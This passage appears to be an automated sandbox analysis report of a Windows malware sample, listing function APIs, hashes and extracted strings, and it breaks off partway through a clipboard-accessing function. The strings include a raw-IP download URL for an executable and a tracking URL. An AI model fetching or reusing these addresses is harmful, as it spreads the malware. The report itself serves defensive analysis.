                                                            • Instruction ID: a623cdb998c7220ef1d2bd35fd9a9c36a78486dd08d205d035a430f27bf863f3
                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction Fuzzy Hash: 10526974A01229DFDB64CF58C985BACBBB1BF09305F1480D9E94DAB251DB30AE89DF14
                                                            Function 00402C24 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 185networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C47
                                                              • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                              • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E5F
                                                            • InternetCloseHandle.WININET(00000000), ref: 00402E70
                                                            • InternetCloseHandle.WININET(00000000), ref: 00402E73
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseHandleOpen_wcslen
                                                            • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                            • API String ID: 3067768807-1501832161
                                                            • Opcode ID: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                            • Instruction ID: 48789f1b3701ba946f3e6b41f8bd096f2728906552624118b4e60daa7bc135c0
                                                            • Opcode Fuzzy Hash: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                            • Instruction Fuzzy Hash: 89516095A65344A8E320EFB0BC52F363378EF58712F10643BE518CB2B2E3B59944875E
                                                            Function 004051F5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                            • String ID: %X@
                                                            • API String ID: 1687354797-3313093589
                                                            • Opcode ID: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                            • Instruction ID: b3e9ac138a89c9aab4b32a44e65933d882eee500b320c13cfd578e42c41f9d09
                                                            • Opcode Fuzzy Hash: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                            • Instruction Fuzzy Hash: 3D214172C042499ADF15EBE9D881BDEB7F8AF08318F14407FE504B72C1DB7D99488A69
                                                            Function 0042DFE0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                            • ExitThread.KERNEL32 ref: 0042DFFA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorExitLastThread
                                                            • String ID: 11@$f(@
                                                            • API String ID: 1611280651-1277599000
                                                            • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                            • Instruction ID: 8ccfe30e394ff3a7da82f1aad20c2a43f0afb1cc8a6867a0b2db1ae1affa3120
                                                            • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                            • Instruction Fuzzy Hash: 5BF0C874600624AFDB04AFB1D80ABAD3B70FF49715F10056EF4055B392CB796955CB68
                                                            Function 00405825 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • std::_Cnd_initX.LIBCPMT ref: 00405841
                                                            • __Cnd_signal.LIBCPMT ref: 0040584D
                                                            • std::_Cnd_initX.LIBCPMT ref: 00405862
                                                            • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405869
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                            • String ID:
                                                            • API String ID: 2059591211-0
                                                            • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                            • Instruction ID: d72f8bc51fec51febc5e3899202a3526e07d3a061d0a8301a91111c4e624332c
                                                            • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                            • Instruction Fuzzy Hash: 20F0A7714007009BE7317762C817B0A77A0AF0031DF10883FF15A769E2CF7DA8544A5D
                                                            Function 00402980 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 435 402980-4029eb call 426850 call 42a36b call 42b474 call 402843 444 4029f9-402a13 call 404358 call 40f8f4 435->444 445 4029ed-4029f0 435->445 445->444 447 4029f2-4029f6 445->447 447->444 449 4029f8 447->449 449->444
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 004029AF
                                                            • __fassign.LIBCMT ref: 004029BF
                                                              • Part of subcall function 00402843: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                            • String ID: 4+@
                                                            • API String ID: 2843524283-3700369575
                                                            • Opcode ID: d6927ac8dcf44b0011b1dce344e42bafe9dfab0a11997840a9f38d6492e0eb02
                                                            • Instruction ID: 257e808548a25f0c421a3fe296c20495207b494aef35f76eb7bec397418e7454
                                                            • Opcode Fuzzy Hash: d6927ac8dcf44b0011b1dce344e42bafe9dfab0a11997840a9f38d6492e0eb02
                                                            • Instruction Fuzzy Hash: 1801F9B1E0021C5ADB24FA25EC46BEF7768AB41304F0402FFA705E31C1D9785E45CA88
                                                            Function 0042E134 Relevance: 4.6, APIs: 3, Instructions: 54threadCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 452 42e134-42e13f 453 42e141-42e153 call 42eae9 call 42a5bd 452->453 454 42e155-42e168 call 42e0eb 452->454 469 42e1a5-42e1a8 453->469 460 42e196 454->460 461 42e16a-42e187 CreateThread 454->461 462 42e198-42e1a4 call 42e05d 460->462 464 42e1a9-42e1ae 461->464 465 42e189-42e195 GetLastError call 42eab3 461->465 462->469 467 42e1b0-42e1b3 464->467 468 42e1b5-42e1b7 464->468 465->460 467->468 468->462
                                                            APIs
                                                            • CreateThread.KERNEL32(?,?,Function_0002DFE0,00000000,?,?), ref: 0042E17D
                                                            • GetLastError.KERNEL32(?,?,?,?,?,0040CF33,00000000,00000000,?,?,00000000,?), ref: 0042E189
                                                            • __dosmaperr.LIBCMT ref: 0042E190
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorLastThread__dosmaperr
                                                            • String ID:
                                                            • API String ID: 2744730728-0
                                                            • Opcode ID: f788247bfe16cd787040539d6f1c9311eafedbd5b023f877c643640da45ad27a
                                                            • Instruction ID: e33ff4e630afc97a712763e24a24b73512c1ee0121ef7b9dc61686095db8a569
                                                            • Opcode Fuzzy Hash: f788247bfe16cd787040539d6f1c9311eafedbd5b023f877c643640da45ad27a
                                                            • Instruction Fuzzy Hash: 7F01D236600229ABDB119FA3FC05AAF3B69EF81360F50013AF91582210DB358921DBA8
                                                            Function 00434775 Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 473 434775-43478d call 439941 476 4347a0-4347b6 SetFilePointerEx 473->476 477 43478f-434794 call 42eae9 473->477 479 4347c7-4347d1 476->479 480 4347b8-4347c5 GetLastError call 42eab3 476->480 482 43479a-43479e 477->482 481 4347d3-4347e8 479->481 479->482 480->482 486 4347ed-4347f2 481->486 482->486
                                                            APIs
                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDFA,00000000,00000002,0040DDFA,00000000,?,?,?,00434824,00000000,00000000,0040DDFA,00000002), ref: 004347AE
                                                            • GetLastError.KERNEL32(?,00434824,00000000,00000000,0040DDFA,00000002,?,0042C181,?,00000000,00000000,00000001,?,0040DDFA,?,0042C236), ref: 004347B8
                                                            • __dosmaperr.LIBCMT ref: 004347BF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer__dosmaperr
                                                            • String ID:
                                                            • API String ID: 2336955059-0
                                                            • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                            • Instruction ID: 3f4161a45120eee3ca6c804ab5e0c8b7ff266a4415271cac2496bd2984e95623
                                                            • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                            • Instruction Fuzzy Hash: CC016836610114ABCB159FAADC058EF7B29EFCA730F24030AF814872C0EB74AD418794
                                                            Function 00402BCD Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 487 402bcd-402bf9 RegCreateKeyExW 488 402bfb-402c0d RegSetValueExW 487->488 489 402c0f-402c12 487->489 488->489 490 402c14-402c17 RegCloseKey 489->490 491 402c1d-402c23 489->491 490->491
                                                            APIs
                                                            • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BEF
                                                            • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C07
                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C17
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateValue
                                                            • String ID:
                                                            • API String ID: 1818849710-0
                                                            • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                            • Instruction ID: 5f9d8f05081ab8e61a544dd9ed380a1f0a89feb258115cbe41ff1dcf5e2af099
                                                            • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                            • Instruction Fuzzy Hash: 75F0B4B650011CFFEB214F94DD89DAFBA7CEB417E9F100175FA01B2150D6B14E009664
                                                            Function 0042E094 Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 492 42e094-42e0a1 call 431f7e 495 42e0a3-42e0a6 ExitThread 492->495 496 42e0ac-42e0b4 492->496 496->495 497 42e0b6-42e0ba 496->497 498 42e0c1-42e0c7 497->498 499 42e0bc call 435516 497->499 501 42e0d4-42e0da 498->501 502 42e0c9-42e0cb 498->502 499->498 501->495 504 42e0dc-42e0de 501->504 502->501 503 42e0cd-42e0ce CloseHandle 502->503 503->501 504->495 505 42e0e0-42e0ea FreeLibraryAndExitThread 504->505
                                                            APIs
                                                              • Part of subcall function 00431F7E: GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                              • Part of subcall function 00431F7E: _free.LIBCMT ref: 00431FB8
                                                              • Part of subcall function 00431F7E: SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                            • ExitThread.KERNEL32 ref: 0042E0A6
                                                            • CloseHandle.KERNEL32(?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0CE
                                                            • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0E4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                            • String ID:
                                                            • API String ID: 1198197534-0
                                                            • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                            • Instruction ID: 02d263aed51cb6b3bee4cffa2fb4446158e609bbc081d0db7e94150c61e2e04c
                                                            • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                            • Instruction Fuzzy Hash: 8FF05E302006347BDB356F27E808A5B3AA8AF05764F484726B924C37A1D7B8DD828698
                                                            Function 0043CFEB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 506 43cfeb-43d005 call 43f961 509 43d007-43d00a 506->509 510 43d00c-43d024 call 43d05c 506->510 511 43d038-43d03b 509->511 513 43d029-43d037 call 43348a 510->513 513->511
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID: 'C
                                                            • API String ID: 269201875-3508614867
                                                            • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                            • Instruction ID: ac23cf383b269f77c0b068b48fc7cf8c71372a03a023b6a8bdb9567da4463856
                                                            • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                            • Instruction Fuzzy Hash: D0F09A32810008BBCF155E96EC01DDF3B6AEF89338F10115AFA1492150DA3A8A22ABA4
                                                            Function 004023BA Relevance: 3.1, APIs: 2, Instructions: 129windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 004023E1
                                                            • PostQuitMessage.USER32(00000000), ref: 00402583
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: MessagePostProcQuitWindow
                                                            • String ID:
                                                            • API String ID: 3873111417-0
                                                            • Opcode ID: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                            • Instruction ID: f7540e8b067131d9abd8b97533556e050534cde561c52fa9c46de49641595c4f
                                                            • Opcode Fuzzy Hash: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                            • Instruction Fuzzy Hash: 91410C15A64384A9E730EFA5BD15B2537B0EF64762F10253BE528DB2F2E3B58580C30E
                                                            Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 105sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(0000215D), ref: 00401562
                                                              • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                              • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$Sleep
                                                            • String ID: http://176.113.115.37/ScreenUpdateSync.exe
                                                            • API String ID: 3358372957-2681926500
                                                            • Opcode ID: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                            • Instruction ID: a225884332a17bf582b8fadba65ee921369c39f73c189ef0fca73ca0a6338174
                                                            • Opcode Fuzzy Hash: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                            • Instruction Fuzzy Hash: 6E318C15A6538094E230CFA5BC66B252330FFA8752F51253BD60CCB2F2E7A19583C71E
                                                            Function 00A50E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000400,?,?,00A50223,?,?), ref: 00A50E19
                                                            • SetErrorMode.KERNEL32(00000000,?,?,00A50223,?,?), ref: 00A50E1E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction ID: 6997d95fe0bba384da2db6e9190e1a8979efa8172c50f28b72e00f6c9120b453
                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction Fuzzy Hash: 10D0123114512877D7002B94DC09BCD7B1CDF05B63F108411FF0DD9080C770994046E5
                                                            Function 004341A6 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                            • Instruction ID: c13f0aaa9ffca533a2c3afb5b433fd4ee60c85f45f94f80d5c2ee7b15d17ea23
                                                            • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                            • Instruction Fuzzy Hash: 2051C331A00218AFDB10DF59C840BEA7BA1EBC9364F19919AF809AB391C735FD42CB54
                                                            Function 004036C4 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock
                                                            • String ID:
                                                            • API String ID: 2638373210-0
                                                            • Opcode ID: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                            • Instruction ID: b9260250dbf28f9d15b3c818f63209514cdecf0a47afbf9c4decfe0e49894dcf
                                                            • Opcode Fuzzy Hash: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                            • Instruction Fuzzy Hash: 95316AF5604716AFC710CF2AC880A1ABFA9BF84351F04C53EF84497791D739DA548B8A
                                                            Function 00402843 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Ios_base_dtorstd::ios_base::_
                                                            • String ID:
                                                            • API String ID: 323602529-0
                                                            • Opcode ID: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                            • Instruction ID: 06a190b1af6bffd0b30009583d7beab466b865d2b1cdf6d05da26eaaeda62aaf
                                                            • Opcode Fuzzy Hash: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                            • Instruction Fuzzy Hash: E3312CB4D002199BDB04EFA5C891AEDBBB4BF58304F5085AEE415B3681DB786A48CF54
                                                            Function 00403CE7 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: H_prolog3_catch
                                                            • String ID:
                                                            • API String ID: 3886170330-0
                                                            • Opcode ID: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                            • Instruction ID: 130d185d73aa858ab00e75432ddc36e19440830dd378bf412e93c481dd82f4d6
                                                            • Opcode Fuzzy Hash: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                            • Instruction Fuzzy Hash: 98215870A00245EFCB11DF55C480EAEBBB5BF48704F2480AEE805AB391C778AE50CB94
                                                            Function 004327A5 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: __wsopen_s
                                                            • String ID:
                                                            • API String ID: 3347428461-0
                                                            • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                            • Instruction ID: 247e0a556512b48f7b921b083965eca1f7392b8622cfa12ec24d1c2ccd616764
                                                            • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                            • Instruction Fuzzy Hash: B511067590420AAFCB05DF58E94199A7BF4EF48314F10406AF809AB311D671EA158BA9
                                                            Function 004336C7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                            • Instruction ID: 8b2e0ce5f68243881f48833c9379da8a786ec54fae66de81054fb87b7da3eb6a
                                                            • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                            • Instruction Fuzzy Hash: C9E0E5B1A046207ADA302FA65C06B5B3A48AF497B2F056133FC0592290FF2CDE4081AD
                                                            Function 0040FB31 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004103E7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throw
                                                            • String ID:
                                                            • API String ID: 2005118841-0
                                                            • Opcode ID: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                            • Instruction ID: f0ff8e4b9f7cc01ea46f57855d09a1922a3c0907516a33a9cf8cca3f22e82038
                                                            • Opcode Fuzzy Hash: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                            • Instruction Fuzzy Hash: E8E02B3050030D76CB107A65FC1195E33381A00328F90413BBC24A14D1EF78F99D858D
                                                            Function 0043CD2A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                            • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                            • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                            • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                            Function 00869B95 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00869BE6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555377117.0000000000869000.00000040.00000020.00020000.00000000.sdmp, Offset: 00869000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_869000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction ID: 7c198ffd8842638df1cadaf7d6155a0d7570fa7ea1249e0ea45223162e9ba35d
                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction Fuzzy Hash: 66113F79A00208EFDB01DF98C985E98BBF5EF08350F058094F9489B362D371EA50DF80

                                                            Non-executed Functions

                                                            Function 00A51947 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog3_GS.LIBCMT ref: 00A51951
                                                            • Sleep.KERNEL32(000011EB), ref: 00A5195B
                                                              • Part of subcall function 00A5CE9C: _strlen.LIBCMT ref: 00A5CEB3
                                                            • OpenClipboard.USER32(00000000), ref: 00A51988
